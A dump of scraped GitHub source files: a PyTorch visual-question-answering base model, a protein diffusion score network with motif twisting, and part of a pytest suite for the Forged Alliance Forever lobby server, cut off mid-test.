| mmilesi/HTopMultilepAnalysis | scripts/jobOptions_HTopMultilepNTupReprocesser.py | jobOptions_HTopMultilepNTupReprocesser.py | py | 9,263 | python | en | code | 0 | github-code | 36 |
6200744085 | import torch
import torch.nn as nn
from attention import NewAttention
from language_model import (
WordEmbedding,
QuestionEmbedding,
TemporalConvNet,
BertEmbedding,
)
from classifier import SimpleClassifier
from fc import FCNet
class BaseModel(nn.Module):
def __init__(self, w_emb, q_emb, v_att, q_net, v_net, classifier):
super(BaseModel, self).__init__()
self.w_emb = w_emb
self.q_emb = q_emb
self.v_att = v_att
self.q_net = q_net
self.v_net = v_net
self.classifier = classifier
def forward(self, v, q, attention_output=False):
"""Forward
v: [batch, num_objs, obj_dim], visual features
b: [batch, num_objs, b_dim], spatial features
q: [batch_size, seq_length], tokenized question
return: logits, not probs
"""
w_emb = self.w_emb(q)
q_emb = self.q_emb(w_emb) # [batch, q_dim]
att = self.v_att(v, q_emb)
# use att weights to compute attention output
v_emb = (att * v).sum(1) # [batch, v_dim], values are img features
q_repr = self.q_net(q_emb)
v_repr = self.v_net(v_emb)
joint_repr = q_repr * v_repr
logits = self.classifier(joint_repr)
if attention_output:
return logits, att
return logits
def build_baseline0_newatt(
dataset,
num_hid,
bidirectional=False,
emb_dim=300,
w_emb_type="baseline",
rnn_type="GRU",
activation=nn.ReLU,
rnn_init=False,
relu_init=False,
var_analysis=False,
):
if w_emb_type == "BERT":
w_emb = BertEmbedding(0.0)
else:
w_emb = WordEmbedding(dataset.dictionary.ntoken, emb_dim, 0.0)
if rnn_type == "TCN":
q_emb = TemporalConvNet(14, [14] * 2, num_hid, kernel_size=(3, 300))
else:
q_emb = QuestionEmbedding(
emb_dim,
num_hid,
1,
bidirectional,
0.0,
rnn_type=rnn_type,
personalized_init=rnn_init,
)
num_hid = num_hid * 2 if bidirectional else num_hid # to double number of params
v_att = NewAttention(dataset.v_dim, q_emb.out_size, num_hid, activation=activation)
q_net = FCNet(
[q_emb.out_size, num_hid],
activation,
relu_init=relu_init,
var_analysis=var_analysis,
name="q_net",
)
v_net = FCNet(
[dataset.v_dim, num_hid],
activation,
relu_init=relu_init,
var_analysis=var_analysis,
name="v_net",
)
classifier = SimpleClassifier(
num_hid, num_hid * 2, dataset.num_ans_candidates, 0.5, activation
)
return BaseModel(w_emb, q_emb, v_att, q_net, v_net, classifier)
| cliziam/VQA_project_Demo | demo-vqa-webcam/base_model.py | base_model.py | py | 2,732 | python | en | code | 0 | github-code | 36 |
28890245799 | """Score network module."""
import torch
import copy
import math
from torch import nn
from torch.nn import functional as F
from openfold.utils.rigid_utils import Rigid, Rotation
from data import utils as du
from data import all_atom
from model import ipa_pytorch
from motif_scaffolding import twisting
import functools as fn
Tensor = torch.Tensor
def get_index_embedding(indices, embed_size, max_len=2056):
"""Creates sine / cosine positional embeddings from a pruespecified indices.
Args:
indices: offsets of size [..., N_edges] of type integer
max_len: maximum length.
embed_size: dimension of the embeddings to create
Returns:
positional embedding of shape [N, embed_size]
"""
K = torch.arange(embed_size//2).to(indices.device)
pos_embedding_sin = torch.sin(
indices[..., None] * math.pi / (max_len**(2*K[None]/embed_size))).to(indices.device)
pos_embedding_cos = torch.cos(
indices[..., None] * math.pi / (max_len**(2*K[None]/embed_size))).to(indices.device)
pos_embedding = torch.cat([
pos_embedding_sin, pos_embedding_cos], axis=-1)
return pos_embedding
def get_timestep_embedding(timesteps, embedding_dim, max_positions=10000):
# Code from https://github.com/hojonathanho/diffusion/blob/master/diffusion_tf/nn.py
assert len(timesteps.shape) == 1
timesteps = timesteps * max_positions
half_dim = embedding_dim // 2
emb = math.log(max_positions) / (half_dim - 1)
emb = torch.exp(torch.arange(half_dim, dtype=torch.float32, device=timesteps.device) * -emb)
emb = timesteps.float()[:, None] * emb[None, :]
emb = torch.cat([torch.sin(emb), torch.cos(emb)], dim=1)
if embedding_dim % 2 == 1: # zero pad
emb = F.pad(emb, (0, 1), mode='constant')
assert emb.shape == (timesteps.shape[0], embedding_dim)
return emb
class Embedder(nn.Module):
def __init__(self, model_conf):
super(Embedder, self).__init__()
self._model_conf = model_conf
self._embed_conf = model_conf.embed
# Time step embedding
index_embed_size = self._embed_conf.index_embed_size
t_embed_size = index_embed_size
node_embed_dims = t_embed_size + 1
edge_in = (t_embed_size + 1) * 2
# Sequence index embedding
node_embed_dims += index_embed_size
edge_in += index_embed_size
node_embed_size = self._model_conf.node_embed_size
self.node_embedder = nn.Sequential(
nn.Linear(node_embed_dims, node_embed_size),
nn.ReLU(),
nn.Linear(node_embed_size, node_embed_size),
nn.ReLU(),
nn.Linear(node_embed_size, node_embed_size),
nn.LayerNorm(node_embed_size),
)
if self._embed_conf.embed_self_conditioning:
edge_in += self._embed_conf.num_bins
edge_embed_size = self._model_conf.edge_embed_size
self.edge_embedder = nn.Sequential(
nn.Linear(edge_in, edge_embed_size),
nn.ReLU(),
nn.Linear(edge_embed_size, edge_embed_size),
nn.ReLU(),
nn.Linear(edge_embed_size, edge_embed_size),
nn.LayerNorm(edge_embed_size),
)
self.timestep_embedder = fn.partial(
get_timestep_embedding,
embedding_dim=self._embed_conf.index_embed_size
)
self.index_embedder = fn.partial(
get_index_embedding,
embed_size=self._embed_conf.index_embed_size
)
def _cross_concat(self, feats_1d, num_batch, num_res):
return torch.cat([
torch.tile(feats_1d[:, :, None, :], (1, 1, num_res, 1)),
torch.tile(feats_1d[:, None, :, :], (1, num_res, 1, 1)),
], dim=-1).float().reshape([num_batch, num_res**2, -1])
def forward(
self,
*,
seq_idx,
t,
fixed_mask,
self_conditioning_ca,
):
"""Embeds a set of inputs
Args:
seq_idx: [..., N] Positional sequence index for each residue.
t: Sampled t in [0, 1].
fixed_mask: mask of fixed (motif) residues.
self_conditioning_ca: [..., N, 3] Ca positions of self-conditioning
input.
Returns:
node_embed: [B, N, D_node]
edge_embed: [B, N, N, D_edge]
"""
num_batch, num_res = seq_idx.shape
node_feats = []
# Set time step to epsilon=1e-5 for fixed residues.
fixed_mask = fixed_mask[..., None]
prot_t_embed = torch.tile(
self.timestep_embedder(t)[:, None, :], (1, num_res, 1))
prot_t_embed = torch.cat([prot_t_embed, fixed_mask], dim=-1)
node_feats = [prot_t_embed]
pair_feats = [self._cross_concat(prot_t_embed, num_batch, num_res)]
# Positional index features.
node_feats.append(self.index_embedder(seq_idx))
rel_seq_offset = seq_idx[:, :, None] - seq_idx[:, None, :]
rel_seq_offset = rel_seq_offset.reshape([num_batch, num_res**2])
pair_feats.append(self.index_embedder(rel_seq_offset))
# Self-conditioning distogram.
if self._embed_conf.embed_self_conditioning:
sc_dgram = du.calc_distogram(
self_conditioning_ca,
self._embed_conf.min_bin,
self._embed_conf.max_bin,
self._embed_conf.num_bins,
)
pair_feats.append(sc_dgram.reshape([num_batch, num_res**2, -1]))
node_embed = self.node_embedder(torch.cat(node_feats, dim=-1).float())
edge_embed = self.edge_embedder(torch.cat(pair_feats, dim=-1).float())
edge_embed = edge_embed.reshape([num_batch, num_res, num_res, -1])
if torch.any(node_embed.isnan()):
print("node_embed is somewhere nan in Embedder")
import ipdb; ipdb.set_trace()
return node_embed, edge_embed
class ScoreNetwork(nn.Module):
def __init__(self, model_conf, diffuser):
super(ScoreNetwork, self).__init__()
self._model_conf = model_conf
self.embedding_layer = Embedder(model_conf)
self.diffuser = diffuser
self.score_model = ipa_pytorch.IpaScore(model_conf, diffuser)
def _apply_mask(self, aatype_diff, aatype_0, diff_mask):
return diff_mask * aatype_diff + (1 - diff_mask) * aatype_0
def forward(self, input_feats, F=None,
use_twisting=False, twist_scale=1.,
twist_potential_rot=True,
twist_potential_trans=True,
twist_update_rot=True,
twist_update_trans=True,
):
"""Forward computes the reverse diffusion conditionals p(X^t|X^{t+1})
for each item in the batch
Args:
X: the noised samples from the noising process, of shape [Batch, N, D].
Where the T time steps are t=1,...,T (i.e. not including the un-noised X^0)
Returns:
model_out: dictionary of model outputs.
"""
# Frames as [batch, res, 7] tensors.
bb_mask = input_feats['res_mask'].type(torch.float32) # [B, N]
fixed_mask = input_feats['fixed_mask'].type(torch.float32)
edge_mask = bb_mask[..., None] * bb_mask[..., None, :]
# Initial embeddings of positonal and relative indices.
init_node_embed, init_edge_embed = self.embedding_layer(
seq_idx=input_feats['seq_idx'],
t=input_feats['t'],
fixed_mask=fixed_mask,
self_conditioning_ca=input_feats['sc_ca_t'],
)
edge_embed = init_edge_embed * edge_mask[..., None]
node_embed = init_node_embed * bb_mask[..., None]
if torch.any(node_embed.isnan()):
print("node_embed is somewhere nan")
import ipdb; ipdb.set_trace()
# If input_feats has conditioning information, update input rigids to track gradients
if use_twisting and "rigids_motif" in input_feats:
# Log that we are using conditioning
Log_delta_R, delta_x = twisting.perturbations_for_grad(input_feats, self.diffuser)
# Run main network
model_out = self.score_model(node_embed, edge_embed, input_feats)
# Psi angle prediction
gt_psi = input_feats['torsion_angles_sin_cos'][..., 2, :]
psi_pred = self._apply_mask(
model_out['psi'], gt_psi, 1 - fixed_mask[..., None])
pred_out = {'psi_pred': psi_pred}
pred_out['rot_score'] = model_out['rot_score']
pred_out['trans_score'] = model_out['trans_score']
final_rigids = Rigid(Rotation(model_out['R_final']), model_out['trans_final'])
model_out['final_rigids'] = final_rigids
rigids_pred = model_out['final_rigids']
pred_out['rigids'] = rigids_pred.to_tensor_7()
# If input_feats has conditioning information, compute conditional score
if use_twisting:
grad_R_log_p_motif, grad_x_log_p_motif, max_log_p_idx, twist_log_p = twisting.grad_log_lik_approx(
R_t=input_feats['R_t'],
R_pred=model_out['R_final'],
trans_pred=model_out['trans_final'],
motif_tensor_7=input_feats['rigids_motif'],
Log_delta_R=Log_delta_R, delta_x=delta_x,
se3_diffuser=self.diffuser,
t=input_feats['t'],
F=F,
twist_scale=twist_scale,
twist_potential_rot=twist_potential_rot,
twist_potential_trans=twist_potential_trans,
)
pred_out['max_log_p_idx'] = max_log_p_idx
pred_out['twist_log_p'] = twist_log_p
verbose = False
if verbose:
# Log the mean norms of the two gradients
grad_R_log_p_motif_norm = torch.norm(grad_R_log_p_motif, dim=[-2, -1]).mean()
grad_x_log_p_motif_norm = torch.norm(grad_x_log_p_motif, dim=[-1]).mean()
print("input_feats[t]: ", input_feats['t'])
print("grad_R_log_p_motif_norm: ", grad_R_log_p_motif_norm)
print("grad_x_log_p_motif_norm: ", grad_x_log_p_motif_norm)
# Log the means of the unconditioanal gradients
grad_R_uncond = pred_out['rot_score']
grad_x_uncond = pred_out['trans_score']
grad_R_uncond_norm = torch.norm(grad_R_uncond, dim=[-2, -1]).mean()
grad_x_uncond_norm = torch.norm(grad_x_uncond, dim=[-1]).mean()
print("grad_R_uncond_norm: ", grad_R_uncond_norm)
print("grad_x_uncond_norm: ", grad_x_uncond_norm)
# scale grad_R_log_p_motif such that each 3x3 matrix can have Frobenius norm at most 1000
if sum(torch.isnan(grad_R_log_p_motif).flatten()) > 0:
num_nans = sum(torch.isnan(grad_R_log_p_motif).flatten())
print("grad_R_log_p_motif has ", num_nans, " nans")
# set the nans to 0
# first find indices corresponding to nans
nan_indices = torch.where(torch.isnan(grad_R_log_p_motif[0]).sum(dim=[-2,-1]))[0]
# set rotation matrices to zero if they have nans
grad_R_log_p_motif[0, nan_indices] = 0.
# Consider doing something similar for translations? (i.e. for scaling)
# TODO: Do ablation to check if this matters! (i.e. if we don't scale the gradients)
max_norm = 1e3
norms = torch.norm(grad_R_log_p_motif, dim=[-2, -1], keepdim=True) # keep the last dimensions
if sum(norms.flatten() > max_norm) > 0:
print("norms of grad_R_log_p_motif are ", norms.shape, norms.flatten())
grad_R_scaling = max_norm / (max_norm + norms)
grad_R_log_p_motif = grad_R_scaling*grad_R_log_p_motif
if sum(norms.flatten() > max_norm) > 0:
print("norms of grad_trans_log_p_motif are ", norms.shape, norms.flatten())
#norms = torch.norm(grad_x_log_p_motif, dim=[-1], keepdim=True) # keep the last dimensions
#if sum(norms.flatten() > max_norm) > 0:
# print("norms of grad_trans_log_p_motif are ", norms.shape, norms.flatten())
#grad_x_scaling = max_norm / (max_norm + norms)
#grad_x_log_p_motif = grad_x_scaling*grad_x_log_p_motif
if twist_update_rot:
pred_out['rot_score_uncond'] = pred_out['rot_score'].detach().clone()
pred_out['rot_score'] = pred_out['rot_score'] + grad_R_log_p_motif
if twist_update_trans:
pred_out['trans_score_uncond'] = pred_out['trans_score'].detach().clone()
pred_out['trans_score'] = pred_out['trans_score'] + grad_x_log_p_motif
bar_a_t = torch.exp(-self.diffuser._r3_diffuser.marginal_b_t(input_feats['t']))
factor_on_score_x = (1-bar_a_t)/torch.sqrt(bar_a_t)
rigids_pred = Rigid.from_tensor_7(pred_out['rigids'])
pred_out['rigids_uncond'] = pred_out['rigids'].detach().clone()
x_pred = rigids_pred.get_trans()
x_pred = x_pred + factor_on_score_x[:, None, None] * self.diffuser._r3_diffuser._unscale(grad_x_log_p_motif)
rigids_pred._trans = x_pred
pred_out['rigids'] = rigids_pred.to_tensor_7()
for k, v in input_feats.items():
# check if a the value is a tensor, and detach if so.
if isinstance(v, torch.Tensor):
input_feats[k] = v.detach()
return pred_out
| blt2114/twisted_diffusion_sampler | protein_exp/model/score_network.py | score_network.py | py | 13,595 | python | en | code | 11 | github-code | 36 |
74060670184 | import re
from hashlib import sha256
from unittest import mock
import pytest
from aiohttp import web
from sqlalchemy import and_, select
from server.config import config
from server.db.models import ban, friends_and_foes
from server.exceptions import BanError, ClientError
from server.game_service import GameService
from server.gameconnection import GameConnection
from server.games import CustomGame, Game, GameState, InitMode, VisibilityState
from server.geoip_service import GeoIpService
from server.ice_servers.nts import TwilioNTS
from server.ladder_service import LadderService
from server.lobbyconnection import LobbyConnection
from server.matchmaker import Search
from server.oauth_service import OAuthService
from server.party_service import PartyService
from server.player_service import PlayerService
from server.players import PlayerState
from server.protocol import DisconnectedError, QDataStreamProtocol
from server.rating import InclusiveRange, RatingType
from server.team_matchmaker import PlayerParty
from server.types import Address
@pytest.fixture()
def test_game_info():
return {
"title": "Test game",
"visibility": VisibilityState.PUBLIC.value,
"mod": "faf",
"mapname": "scmp_007",
"password": None,
"lobby_rating": 1,
"options": []
}
@pytest.fixture()
def test_game_info_invalid():
return {
"title": "Title with non ASCI char \xc3",
"visibility": VisibilityState.PUBLIC.value,
"mod": "faf",
"mapname": "scmp_007",
"password": None,
"lobby_rating": 1,
"options": []
}
@pytest.fixture
def mock_player(player_factory):
return player_factory("Dummy", player_id=42, lobby_connection_spec=None)
@pytest.fixture
def mock_nts_client():
return mock.create_autospec(TwilioNTS)
@pytest.fixture
def mock_players():
return mock.create_autospec(PlayerService)
@pytest.fixture
def mock_games():
return mock.create_autospec(GameService)
@pytest.fixture
def mock_protocol():
return mock.create_autospec(QDataStreamProtocol(mock.Mock(), mock.Mock()))
@pytest.fixture
def mock_geoip():
return mock.create_autospec(GeoIpService)
@pytest.fixture
def lobbyconnection(
event_loop,
database,
mock_protocol,
mock_games,
mock_players,
mock_player,
mock_geoip,
mock_nts_client,
rating_service
):
lc = LobbyConnection(
database=database,
geoip=mock_geoip,
game_service=mock_games,
players=mock_players,
nts_client=mock_nts_client,
ladder_service=mock.create_autospec(LadderService),
party_service=mock.create_autospec(PartyService),
oauth_service=mock.create_autospec(OAuthService),
rating_service=rating_service
)
lc.player = mock_player
lc.protocol = mock_protocol
lc.player_service.fetch_player_data = mock.AsyncMock()
lc.peer_address = Address("127.0.0.1", 1234)
lc._authenticated = True
return lc
@pytest.fixture
def policy_server(event_loop):
host = "localhost"
port = 6080
app = web.Application()
routes = web.RouteTableDef()
@routes.post("/verify")
async def token(request):
data = await request.json()
return web.json_response({"result": data.get("uid_hash")})
app.add_routes(routes)
runner = web.AppRunner(app)
async def start_app():
await runner.setup()
site = web.TCPSite(runner, host, port)
await site.start()
event_loop.run_until_complete(start_app())
yield (host, port)
event_loop.run_until_complete(runner.cleanup())
async def test_unauthenticated_calls_abort(lobbyconnection, test_game_info):
lobbyconnection._authenticated = False
lobbyconnection.abort = mock.AsyncMock()
await lobbyconnection.on_message_received({
"command": "game_host",
**test_game_info
})
lobbyconnection.abort.assert_called_once_with(
"Message invalid for unauthenticated connection: game_host"
)
async def test_bad_command_calls_abort(lobbyconnection):
lobbyconnection.send = mock.AsyncMock()
lobbyconnection.abort = mock.AsyncMock()
await lobbyconnection.on_message_received({
"command": "this_isnt_real"
})
lobbyconnection.send.assert_called_once_with({"command": "invalid"})
lobbyconnection.abort.assert_called_once_with("Error processing command")
async def test_command_pong_does_nothing(lobbyconnection):
lobbyconnection.send = mock.AsyncMock()
await lobbyconnection.on_message_received({
"command": "pong"
})
lobbyconnection.send.assert_not_called()
async def test_command_create_account_returns_error(lobbyconnection):
lobbyconnection.send = mock.AsyncMock()
await lobbyconnection.on_message_received({
"command": "create_account"
})
lobbyconnection.send.assert_called_once_with({
"command": "notice",
"style": "error",
"text": ("FAF no longer supports direct registration. "
"Please use the website to register.")
})
async def test_double_login(lobbyconnection, mock_players, player_factory):
lobbyconnection.check_policy_conformity = mock.AsyncMock(return_value=True)
old_player = player_factory(lobby_connection_spec="auto")
old_player.lobby_connection.player = old_player
mock_players.get_player.return_value = old_player
await lobbyconnection.on_message_received({
"command": "hello",
"login": "test",
"password": sha256(b"test_password").hexdigest(),
"unique_id": "blah"
})
old_player.lobby_connection.write_warning.assert_called_with(
"You have been signed out because you signed in elsewhere.",
fatal=True,
style="kick"
)
# This should only be reset in abort, which is mocked for this test
assert old_player.lobby_connection.player is not None
async def test_double_login_disconnected(lobbyconnection, mock_players, player_factory):
lobbyconnection.abort = mock.AsyncMock()
lobbyconnection.check_policy_conformity = mock.AsyncMock(return_value=True)
old_player = player_factory(lobby_connection_spec="auto")
mock_players.get_player.return_value = old_player
old_player.lobby_connection.send_warning.side_effect = DisconnectedError("Test disconnect")
# Should not raise
await lobbyconnection.on_message_received({
"command": "hello",
"login": "test",
"password": sha256(b"test_password").hexdigest(),
"unique_id": "blah"
})
lobbyconnection.abort.assert_not_called()
async def test_command_game_host_creates_game(
lobbyconnection, mock_games, test_game_info, players
):
players.hosting.state = PlayerState.IDLE
lobbyconnection.player = players.hosting
await lobbyconnection.on_message_received({
"command": "game_host",
**test_game_info
})
expected_call = {
"game_mode": "faf",
"game_class": CustomGame,
"name": test_game_info["title"],
"host": players.hosting,
"visibility": VisibilityState.PUBLIC,
"password": test_game_info["password"],
"mapname": test_game_info["mapname"],
"rating_type": RatingType.GLOBAL,
"displayed_rating_range": InclusiveRange(None, None),
"enforce_rating_range": False
}
mock_games.create_game.assert_called_with(**expected_call)
async def test_launch_game(lobbyconnection, game, player_factory):
old_game_conn = mock.create_autospec(GameConnection)
lobbyconnection.player = player_factory()
lobbyconnection.game_connection = old_game_conn
lobbyconnection.send = mock.AsyncMock()
await lobbyconnection.launch_game(game)
# Verify all side effects of launch_game here
old_game_conn.abort.assert_called_with("Player launched a new game")
assert lobbyconnection.game_connection is not None
assert lobbyconnection.game_connection.game == game
assert lobbyconnection.player.game == game
assert lobbyconnection.player.game_connection == lobbyconnection.game_connection
assert lobbyconnection.game_connection.player == lobbyconnection.player
assert lobbyconnection.player.state == PlayerState.IDLE
lobbyconnection.send.assert_called_once()
async def test_command_game_host_creates_correct_game(
lobbyconnection, game_service, test_game_info, players):
lobbyconnection.player = players.hosting
players.hosting.state = PlayerState.IDLE
lobbyconnection.game_service = game_service
lobbyconnection.launch_game = mock.AsyncMock()
await lobbyconnection.on_message_received({
"command": "game_host",
**test_game_info
})
args_list = lobbyconnection.launch_game.call_args_list
assert len(args_list) == 1
args, kwargs = args_list[0]
assert isinstance(args[0], CustomGame)
async def test_command_game_join_calls_join_game(
mocker,
database,
lobbyconnection,
game_service,
test_game_info,
players,
game_stats_service
):
lobbyconnection.send = mock.AsyncMock()
lobbyconnection.game_service = game_service
game = Game(42, database, game_service, game_stats_service)
game.state = GameState.LOBBY
game.password = None
game.game_mode = "faf"
game.id = 42
game.name = "Test Game Name"
game.host = players.hosting
game_service._games[42] = game
lobbyconnection.player = players.joining
players.joining.state = PlayerState.IDLE
test_game_info["uid"] = 42
await lobbyconnection.on_message_received({
"command": "game_join",
**test_game_info
})
expected_reply = {
"command": "game_launch",
"args": ["/numgames", players.hosting.game_count[RatingType.GLOBAL]],
"uid": 42,
"mod": "faf",
"name": "Test Game Name",
"init_mode": InitMode.NORMAL_LOBBY.value,
"game_type": "custom",
"rating_type": "global",
}
lobbyconnection.send.assert_called_with(expected_reply)
async def test_command_game_join_uid_as_str(
mocker,
database,
lobbyconnection,
game_service,
test_game_info,
players,
game_stats_service
):
lobbyconnection.send = mock.AsyncMock()
lobbyconnection.game_service = game_service
game = Game(42, database, game_service, game_stats_service)
game.state = GameState.LOBBY
game.password = None
game.game_mode = "faf"
game.id = 42
game.name = "Test Game Name"
game.host = players.hosting
game_service._games[42] = game
lobbyconnection.player = players.joining
players.joining.state = PlayerState.IDLE
test_game_info["uid"] = "42" # Pass in uid as string
await lobbyconnection.on_message_received({
"command": "game_join",
**test_game_info
})
expected_reply = {
"command": "game_launch",
"args": ["/numgames", players.hosting.game_count[RatingType.GLOBAL]],
"mod": "faf",
"uid": 42,
"name": "Test Game Name",
"init_mode": InitMode.NORMAL_LOBBY.value,
"game_type": "custom",
"rating_type": "global",
}
lobbyconnection.send.assert_called_with(expected_reply)
async def test_command_game_join_without_password(
lobbyconnection,
database,
game_service,
test_game_info,
players,
game_stats_service
):
lobbyconnection.send = mock.AsyncMock()
lobbyconnection.game_service = game_service
game = mock.create_autospec(Game)
game.state = GameState.LOBBY
game.init_mode = InitMode.NORMAL_LOBBY
game.password = "password"
game.game_mode = "faf"
game.id = 42
game.host = players.hosting
game_service._games[42] = game
lobbyconnection.player = players.joining
players.joining.state = PlayerState.IDLE
test_game_info["uid"] = 42
del test_game_info["password"]
await lobbyconnection.on_message_received({
"command": "game_join",
**test_game_info
})
lobbyconnection.send.assert_called_once_with({
"command": "notice",
"style": "info",
"text": "Bad password (it's case sensitive)."
})
async def test_command_game_join_game_not_found(
lobbyconnection,
game_service,
test_game_info,
players
):
lobbyconnection.send = mock.AsyncMock()
lobbyconnection.game_service = game_service
lobbyconnection.player = players.joining
players.joining.state = PlayerState.IDLE
test_game_info["uid"] = 42
await lobbyconnection.on_message_received({
"command": "game_join",
**test_game_info
})
lobbyconnection.send.assert_called_once_with({
"command": "notice",
"style": "info",
"text": "The host has left the game."
})
async def test_command_game_join_game_bad_init_mode(
lobbyconnection,
game_service,
test_game_info,
players
):
lobbyconnection.send = mock.AsyncMock()
lobbyconnection.game_service = game_service
game = mock.create_autospec(Game)
game.state = GameState.LOBBY
game.init_mode = InitMode.AUTO_LOBBY
game.id = 42
game.host = players.hosting
game_service._games[42] = game
lobbyconnection.player = players.joining
lobbyconnection.player.state = PlayerState.IDLE
test_game_info["uid"] = 42
await lobbyconnection.on_message_received({
"command": "game_join",
**test_game_info
})
lobbyconnection.send.assert_called_once_with({
"command": "notice",
"style": "error",
"text": "The game cannot be joined in this way."
})
async def test_command_game_host_calls_host_game_invalid_title(
lobbyconnection, mock_games, test_game_info_invalid
):
lobbyconnection.send = mock.AsyncMock()
mock_games.create_game = mock.Mock()
await lobbyconnection.on_message_received({
"command": "game_host",
**test_game_info_invalid
})
assert mock_games.create_game.mock_calls == []
lobbyconnection.send.assert_called_once_with(
dict(command="notice", style="error", text="Title must contain only ascii characters."))
async def test_abort(mocker, lobbyconnection):
lobbyconnection.protocol.close = mock.AsyncMock()
await lobbyconnection.abort()
lobbyconnection.protocol.close.assert_any_call()
async def test_send_game_list(mocker, database, lobbyconnection, game_stats_service):
games = mocker.patch.object(lobbyconnection, "game_service") # type: GameService
game1, game2 = mock.create_autospec(Game(42, database, mock.Mock(), game_stats_service)), \
mock.create_autospec(Game(22, database, mock.Mock(), game_stats_service))
games.open_games = [game1, game2]
lobbyconnection.send = mock.AsyncMock()
await lobbyconnection.send_game_list()
lobbyconnection.send.assert_any_call({
"command": "game_info",
"games": [game1.to_dict(), game2.to_dict()]
})
async def test_coop_list(mocker, lobbyconnection):
await lobbyconnection.command_coop_list({})
args = lobbyconnection.protocol.write_message.call_args_list
assert len(args) == 5
coop_maps = [arg[0][0] for arg in args]
for info in coop_maps:
del info["uid"]
assert coop_maps == [
{
"command": "coop_info",
"name": "FA Campaign map",
"description": "A map from the FA campaign",
"filename": "maps/scmp_coop_123.v0002.zip",
"featured_mod": "coop",
"type": "FA Campaign"
},
{
"command": "coop_info",
"name": "Aeon Campaign map",
"description": "A map from the Aeon campaign",
"filename": "maps/scmp_coop_124.v0000.zip",
"featured_mod": "coop",
"type": "Aeon Vanilla Campaign"
},
{
"command": "coop_info",
"name": "Cybran Campaign map",
"description": "A map from the Cybran campaign",
"filename": "maps/scmp_coop_125.v0001.zip",
"featured_mod": "coop",
"type": "Cybran Vanilla Campaign"
},
{
"command": "coop_info",
"name": "UEF Campaign map",
"description": "A map from the UEF campaign",
"filename": "maps/scmp_coop_126.v0099.zip",
"featured_mod": "coop",
"type": "UEF Vanilla Campaign"
},
{
"command": "coop_info",
"name": "Prothyon - 16",
"description": "Prothyon - 16 is a secret UEF facility...",
"filename": "maps/prothyon16.v0005.zip",
"featured_mod": "coop",
"type": "Custom Missions"
}
]
async def test_command_admin_closelobby(mocker, lobbyconnection, player_factory):
player = lobbyconnection.player
player.id = 1
tuna = player_factory("Tuna", player_id=55, lobby_connection_spec="auto")
data = {
player.id: player,
tuna.id: tuna
}
lobbyconnection.player_service.__getitem__.side_effect = data.__getitem__
await lobbyconnection.on_message_received({
"command": "admin",
"action": "closelobby",
"user_id": 55
})
tuna.lobby_connection.kick.assert_any_call()
async def test_command_admin_closeFA(lobbyconnection, player_factory):
player = lobbyconnection.player
player.id = 1
tuna = player_factory("Tuna", player_id=55, lobby_connection_spec="auto")
data = {
player.id: player,
tuna.id: tuna
}
lobbyconnection.player_service.__getitem__.side_effect = data.__getitem__
await lobbyconnection.on_message_received({
"command": "admin",
"action": "closeFA",
"user_id": tuna.id
})
tuna.lobby_connection.write.assert_any_call({
"command": "notice",
"style": "kill",
})
async def test_game_subscription(lobbyconnection: LobbyConnection):
game = mock.Mock()
game.handle_action = mock.AsyncMock()
lobbyconnection.game_connection = game
await lobbyconnection.on_message_received({
"command": "test",
"args": ["foo", 42],
"target": "game"
})
game.handle_action.assert_called_with("test", ["foo", 42])
async def test_command_avatar_list(mocker, lobbyconnection: LobbyConnection):
lobbyconnection.send = mock.AsyncMock()
lobbyconnection.player.id = 2 # Dostya test user
await lobbyconnection.on_message_received({
"command": "avatar",
"action": "list_avatar"
})
lobbyconnection.send.assert_any_call({
"command": "avatar",
"avatarlist": [{"url": "https://content.faforever.com/faf/avatars/qai2.png", "tooltip": "QAI"}, {"url": "https://content.faforever.com/faf/avatars/UEF.png", "tooltip": "UEF"}]
})
async def test_command_avatar_select(mocker, database, lobbyconnection: LobbyConnection):
lobbyconnection.player.id = 2 # Dostya test user
await lobbyconnection.on_message_received({
"command": "avatar",
"action": "select",
"avatar": "https://content.faforever.com/faf/avatars/qai2.png"
})
async with database.acquire() as conn:
result = await conn.execute("SELECT selected from avatars where idUser=2")
row = result.fetchone()
assert row.selected == 1
async def get_friends(player_id, database):
async with database.acquire() as conn:
result = await conn.execute(
select(friends_and_foes.c.subject_id).where(
and_(
friends_and_foes.c.user_id == player_id,
friends_and_foes.c.status == "FRIEND"
)
)
)
return [row.subject_id for row in result]
async def test_command_social_add_friend(lobbyconnection, database):
lobbyconnection.player.id = 1
friends = await get_friends(lobbyconnection.player.id, database)
assert friends == []
assert lobbyconnection.player.friends == set()
await lobbyconnection.on_message_received({
"command": "social_add",
"friend": 2
})
friends = await get_friends(lobbyconnection.player.id, database)
assert friends == [2]
assert lobbyconnection.player.friends == {2}
async def test_command_social_remove_friend(lobbyconnection, database):
lobbyconnection.player.id = 2
friends = await get_friends(lobbyconnection.player.id, database)
assert friends == [1]
lobbyconnection.player.friends = {1}
await lobbyconnection.on_message_received({
"command": "social_remove",
"friend": 1
})
friends = await get_friends(lobbyconnection.player.id, database)
assert friends == []
assert lobbyconnection.player.friends == set()
# Removing twice does nothing
await lobbyconnection.on_message_received({
"command": "social_remove",
"friend": 1
})
friends = await get_friends(lobbyconnection.player.id, database)
assert friends == []
assert lobbyconnection.player.friends == set()
async def test_command_ice_servers(
lobbyconnection: LobbyConnection,
mock_nts_client
):
lobbyconnection.send = mock.AsyncMock()
lobbyconnection.coturn_generator.server_tokens = mock.Mock(
return_value=["coturn_tokens"]
)
mock_nts_client.server_tokens.return_value = ["twilio_tokens"]
await lobbyconnection.on_message_received({"command": "ice_servers"})
mock_nts_client.server_tokens.assert_called_once()
lobbyconnection.send.assert_called_once_with({
"command": "ice_servers",
"ice_servers": ["coturn_tokens", "twilio_tokens"],
"ttl": config.TWILIO_TTL
})
async def test_broadcast(lobbyconnection: LobbyConnection, player_factory):
player = lobbyconnection.player
player.lobby_connection = lobbyconnection
player.id = 1
tuna = player_factory("Tuna", player_id=55, lobby_connection_spec="auto")
data = {
player.id: player,
tuna.id: tuna
}
lobbyconnection.player_service.__iter__.side_effect = data.values().__iter__
lobbyconnection.write_warning = mock.Mock()
await lobbyconnection.on_message_received({
"command": "admin",
"action": "broadcast",
"message": "This is a test message"
})
player.lobby_connection.write_warning.assert_called_with("This is a test message")
tuna.lobby_connection.write_warning.assert_called_with("This is a test message")
async def test_broadcast_during_disconnect(lobbyconnection: LobbyConnection, player_factory):
player = lobbyconnection.player
player.lobby_connection = lobbyconnection
player.id = 1
# To simulate when a player has been recently disconnected so that they
# still appear in the player_service list, but their lobby_connection
# object has already been destroyed
tuna = player_factory("Tuna", player_id=55, lobby_connection_spec="auto")
data = {
player.id: player,
